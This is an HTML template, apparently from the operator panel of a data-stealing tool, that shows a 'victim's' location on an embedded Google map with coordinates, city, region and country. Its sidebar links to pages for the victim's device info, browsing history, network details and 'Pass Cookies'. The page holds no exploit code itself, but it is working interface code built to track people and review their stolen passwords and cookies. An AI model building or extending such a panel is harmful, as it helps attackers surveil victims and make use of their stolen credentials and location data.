<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/static/location.css">
    <title>User Location</title>
</head>
<body>
    <div class="container">
        <aside class="sidebar">
            <div class="admin-profile">
                <div class="profile-image">
                    <img src="/static/image/admin-profil.jpg" alt="Admin Profile Picture">
                </div>
                <h2>{{ victim.username }}</h2>
            </div>
            <nav class="sidebar-nav">
                <a class="nav-item" href="/overview?id={{ victim.id }}">Overview</a>
                <a class="nav-item" href="/device?id={{ victim.id }}">Device Info</a>
                <a class="nav-item" href="/history?id={{ victim.id }}">History</a>
                <a class="nav-item" href="/network?id={{ victim.id }}">Network</a>
                <a class="nav-item active" href="/location?id={{ victim.id }}">Location</a>
                <a class="nav-item" href="/passcookies?id={{ victim.id }}">Pass Cookies</a>
            </nav>
            <div class="logout-section">
                <a href="/victim" class="logout-btn">
                    <img src="/static/image/logout-icon.png" alt="Logout Icon" class="logout-icon">
                    Back
                </a>
            </div>
        </aside>

        <main class="info-grid">
            <h1 class="title">User Location</h1>
            <div class="location-container">
                <iframe 
                    src="https://www.google.com/maps?q={{ victim_location.latitude }},{{ victim_location.longitude }}&hl=en&z=12&output=embed" 
                    width="100%" height="500" style="border:0;" allowfullscreen="" loading="lazy"></iframe>
                <p class="location-info">
                    {{ victim_location.latitude }}, {{ victim_location.longitude }},<br>
                    {{ victim_location.city }}, {{ victim_location.region }}, {{ victim_location.country }}
                </p>
            </div>
        </main>
    </div>
</body>
</html>
